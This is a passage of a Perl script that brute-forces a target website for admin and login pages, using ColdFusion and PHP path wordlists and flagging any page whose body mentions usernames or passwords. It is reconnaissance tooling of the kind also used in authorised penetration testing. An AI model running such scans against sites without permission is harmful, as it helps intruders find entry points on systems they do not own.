  4245. print "[-] Not Found <- $final\n";
  4246. }
  4247. }
  4248. }
  4249.  
  4250.  
  4251.  
  4252.  
  4253. # -------------------------------------------------------
  4254. # -------------------test cfm ---------------------------|
  4255. # -------------------------------------------------------
  4256.  
  4257.  
  4258.  
  4259.  
  4260.  
  4261. if($code eq "cfm"){
  4262.  
  # cfm wordlist: the asp list with the .asp entries spelled .cfm; the .html
  # entries and the repeated items (e.g. 'admin/account.cfm') are the same.
  4263. @path1=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  4264. 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm',
  4265. 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  4266. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm',
  4267. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
  4268. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
  4269. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
  4270. 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm',
  4271. 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm',
  4272. 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
  4273. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html',
  4274. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
  4275. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
  4276. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm',
  4277. 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm',
  4278. 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html',
  4279. 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm',
  4280. 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm',
  4281. 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html'
  4282. );
  4283.  
  # Same probe loop and body-keyword test as the asp branch, copied verbatim.
  4284. foreach $ways(@path1){
  4285.  
  4286. $final=$site.$ways;
  4287.  
  4288. my $req=HTTP::Request->new(GET=>$final);
  4289. my $ua=LWP::UserAgent->new();
  4290. $ua->timeout(30);
  4291. my $response=$ua->request($req);
  4292.  
  4293. if($response->content =~ /Username/ ||
  4294. $response->content =~ /Password/ ||
  4295. $response->content =~ /username/ ||
  4296. $response->content =~ /password/ ||
  4297. $response->content =~ /USERNAME/ ||
  4298. $response->content =~ /PASSWORD/ ||
  4299. $response->content =~ /Senha/ ||
  4300. $response->content =~ /senha/ ||
  4301. $response->content =~ /Personal/ ||
  4302. $response->content =~ /Usuario/ ||
  4303. $response->content =~ /Clave/ ||
  4304. $response->content =~ /Usager/ ||
  4305. $response->content =~ /usager/ ||
  4306. $response->content =~ /Sing/ ||
  4307. $response->content =~ /passe/ ||
  4308. $response->content =~ /P\/W/ ||
  4309. $response->content =~ /Admin Password/
  4310. ){
  4311. print " \n [+] Found -> $final\n\n";
  4312. }else{
  4313. print "[-] Not Found <- $final\n";
  4314. }
  4315. }
  4316. }
  4317.  
  4318.  
  4319.  
  4320.  
  4321.  
  4322. # -------------------------------------------------------
  4323. #--------------------------/test-------------------------|
  4324. # -------------------------------------------------------
  4325.  
  4326.  
  4327. if($code eq "php"){
  4328.  
  # php wordlist, kept in @path2 rather than @path1. It includes 'wp-login.php'
  # and a few .asp entries ('admincp/index.asp', 'admincp/login.asp').
  4329. @path2=('cpanel','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
  4330. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
  4331. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
  4332. 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
  4333. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
  4334. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
  4335. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
  4336. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
  4337. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
  4338. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
  4339. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
  4340. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
  4341. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
  4342. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
  4343. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
  4344. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
  4345. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
  4346. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
  4347. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
  4348. );
  4349.  
  # Same probe loop and body-keyword test as the asp and cfm branches.
  4350. foreach $ways(@path2){
  4351.  
  4352. $final=$site.$ways;
  4353.  
  4354. my $req=HTTP::Request->new(GET=>$final);
  4355. my $ua=LWP::UserAgent->new();
  4356. $ua->timeout(30);
  4357. my $response=$ua->request($req);
  4358.  
  4359. if($response->content =~ /Username/ ||
  4360. $response->content =~ /Password/ ||
  4361. $response->content =~ /username/ ||
  4362. $response->content =~ /password/ ||
  4363. $response->content =~ /USERNAME/ ||
  4364. $response->content =~ /PASSWORD/ ||
  4365. $response->content =~ /Senha/ ||
  4366. $response->content =~ /senha/ ||
  4367. $response->content =~ /Personal/ ||
  4368. $response->content =~ /Usuario/ ||
  4369. $response->content =~ /Clave/ ||
  4370. $response->content =~ /Usager/ ||
  4371. $response->content =~ /usager/ ||
  4372. $response->content =~ /Sing/ ||
  4373. $response->content =~ /passe/ ||
  4374. $response->content =~ /P\/W/ ||
  4375. $response->content =~ /Admin Password/
  4376. ){
  4377. print " \n [+] Found -> $final\n\n";
  4378. }else{
  4379. print "[-] Not Found <- $final\n";
  4380. }
  4381. }
  # NOTE(review): NULL is not a Perl keyword; with no 'use strict' in effect it
  # is a bareword. Presumably meant to halt the script after the php scan, to be
  # confirmed. Only the php branch has this call.
  4382. kill("STOP",NULL);
  4383. }}
  4384. }